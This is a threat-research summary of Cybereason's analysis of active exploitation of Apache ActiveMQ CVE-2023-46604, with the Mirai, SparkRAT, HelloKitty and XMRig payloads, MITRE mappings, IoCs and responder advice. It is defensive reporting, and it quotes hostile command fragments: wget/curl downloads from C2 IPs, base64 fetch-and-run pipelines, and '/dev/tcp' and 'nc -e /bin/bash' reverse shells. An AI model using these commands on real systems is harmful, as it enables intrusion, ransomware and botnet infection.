Threat Research

Beware of the Messengers, Exploiting ActiveMQ Vulnerability

Cybereason

Cybereason analyzed active exploitation of Apache ActiveMQ via CVE-2023-46604, showing unauthenticated RCE that delivered Mirai, SparkRAT, HelloKitty ransomware, and XMRig coinminers through wget/curl download chains, base64-encoded scripts, and reverse shells. The attacks abused OpenWire EXCEPTION_RESPONSE loading remote Spring XML (ClassPathXmlApplicationContext) and used post-exploitation steps like disabling DB services, encrypting files, and establishing reverse shells. #CVE-2023-46604 #ApacheActiveMQ

Keypoints

  • Unauthenticated RCE against Apache ActiveMQ (CVE-2023-46604) was exploited prior to public disclosure, enabling direct code execution via the OpenWire protocol.
  • Vulnerable versions: Artemis 2.31.2 and Classic prior to 5.18.3 are impacted by the insecure deserialization/vector involving Spring’s ClassPathXmlApplicationContext.
  • Three primary attack patterns observed: automated wget/curl download chains, base64-encoded scripts that fetch and run payloads (leading to HelloKitty), and interactive/netcat reverse shells (file-descriptor and nc -e methods).
  • Observed payloads include Mirai (ELF), SparkRAT (Go), HelloKitty ransomware (Golang), and XMRig/XMRigCC coinminers; payloads often saved with evasive names and run with nohup to persist.
  • Post-exploitation behavior included stopping database services (mysql/oracle/postgresql), encrypting files (extension .locked), dropping ransom notes and keys, and attempting lateral movement via SSH.
  • Defensive recommendations: restrict ActiveMQ exposure, upgrade affected ActiveMQ versions, add provided IoCs to blocklists, and hunt using endpoint telemetry for the described behaviors.

MITRE Techniques

  • [T1190] Exploit Public-Facing Applications – Used to gain initial unauthenticated RCE against ActiveMQ via OpenWire EXCEPTION_RESPONSE and Spring XML loading (‘…Exploitation of the CVE-2023-46604 vulnerability allows attackers to execute unauthenticated RCE on machines running vulnerable Apache ActiveMQ…’)
  • [T1059] Command and Scripting Interpreter – Attackers executed shell commands (wget, curl, base64 decode, bash) to download and run payloads (‘…the most commonly observed behaviors were attempts to download additional payloads using two separated download commands: wget and curl.’)
  • [T1546.016] Event Triggered Execution: Installer Packages – Adversaries used script-based installers and chmod/chaining to make binaries executable and persistent (nohup) (‘…is given full file privilege (777) via chmod and executes > /dev/null … nohup prevents the process being stopped…’)
  • [T1027] Obfuscated Files or Information – Base64-encoded bash commands were used to hide the payload retrieval and execution steps (‘…the second methodology attempts executing Base64 encoded commands. The decoded commands are similar to first methodologies…’)
  • [T1041] Exfiltration Over C2 Channel – C2 channels used for payload staging and command retrieval indicate potential exfiltration and C2 interaction (‘…C2 server (172.245.16[.]125) … URL related to HelloKitty Ransomware’)
  • [T1567] Exfiltration Over Web Service – Use of web-hosted resources (transfer[.]sh and HTTP endpoints) for payload hosting and control (‘…transfer[.]sh/EewPaMsAUA/xmrig … transfer[.]sh hosting XMRig’)
  • [T1071.001] Application Layer Protocol: Web Protocols – Command-and-control and payload delivery over HTTP/HTTPS (curl/wget to HTTP hosts) (‘…curl command downloads linux.sh from 45.32.120[.]181…’)
  • [T1485] Data Destruction – Ransomware routines included stopping services and removing or overwriting files as part of impact operations (‘…Stops and disables multiple database related services like mysql, oracle, and postgresql.’)
  • [T1486] Data Encryption for Impact – HelloKitty ransomware encrypted files (appended .locked) and dropped ransom notes across directories (‘…Searches through directories and encrypts files with extension .locked. Outputs README1.html on every directory…’)
  • [T1584.005] Compromise Infrastructure: Botnet – Mirai deployment and botnet-related binaries were installed to expand botnet infrastructure (‘…Mirai botnet downloader … wget hxxp://82.115.220[.]81/bins/x86 … Mirai Bot’)

Indicators of Compromise

  • [IP] C2 and staging hosts – 82.115.220[.]81 (Mirai C2), 45.32.120[.]181 (SparkRAT script host), and 16 other IPs used for scanning, staging, and reverse shells
  • [SHA256] Payload hashes – 01c6c81abf1206caf6c4004bae8c4999624228c8b1ce7514503e4150c10c21b5 (XMRig), 7af5c37cc308a222f910d6a7b0759837f37e3270e22ce242a8b59ed4d7ec7ceb (HelloKitty), and 3 more hashes
  • [URL] Payload and script URLs – hxxps://transfer[.]sh/EewPaMsAUA/xmrig (XMRig), hxxp://172.245.16[.]125/down (HelloKitty staging), and other hosting URLs like hxxp://45.32.120[.]181/linux.sh
  • [File name] Observed filenames and scripts – .bash2 (HelloKitty binary), ss64 (HelloKitty payload name), l_x86/.X12-unix (SparkRAT binaries), and other temporary script names

Cybereason’s technical analysis shows CVE-2023-46604 is exploited by sending a malicious OpenWire EXCEPTION_RESPONSE that causes ActiveMQ to use Spring’s ClassPathXmlApplicationContext to load attacker-controlled XML over HTTP; this insecure deserialization chain yields unauthenticated RCE on affected Classic (<5.18.3) and Artemis (2.31.2) builds. Attackers then run shell commands (wget/curl) or base64-encoded bash pipelines to fetch and execute staged scripts (linux.sh, 1.sh, 2.sh, down/.exec), which download architecture-specific binaries (e.g., l_x86, x86, .X12-unix) and set execute permissions (chmod 777) and nohup to persist, producing payloads such as Mirai, SparkRAT, HelloKitty (Golang ransomware), and XMRig/XMRigCC miners.

Post-exploitation behaviors include disabling database services (mysql, oracle, postgresql), recursively encrypting files with a .locked extension, writing ransom notes (README1.html, encfile1.txt, public1.txt, showkey1.txt), and attempting SSH lateral movement. In other cases attackers established interactive access using reverse shells via bash file-descriptors (/dev/tcp//) and Netcat (nc -e /bin/bash), then performed enumeration (ls, whoami, cat .bash_hi) and attempted to host or fetch additional tools with python -m http.server, apt installs, and direct curl/wget retrieval from transfer[.]sh and other hosts.

For responders, focus on: identifying ActiveMQ instances running vulnerable versions, hunting for wget/curl chains, base64-decoded bash commands, nohup executions, unusual binaries in /tmp or /var/tmp, reverse-shell connections to IPs listed in IoCs, and the SHA256 hashes provided; prioritize isolating hosts, blocking IoC network indicators, and restoring from clean images after full remediation.

Read more: https://www.cybereason.com/blog/beware-of-the-messengers-exploiting-activemq-vulnerability

SHARE THIS STORY

WhatsAppX (Twitter)TelegramBlueskyFacebookLinkedInThreadsEmailPrint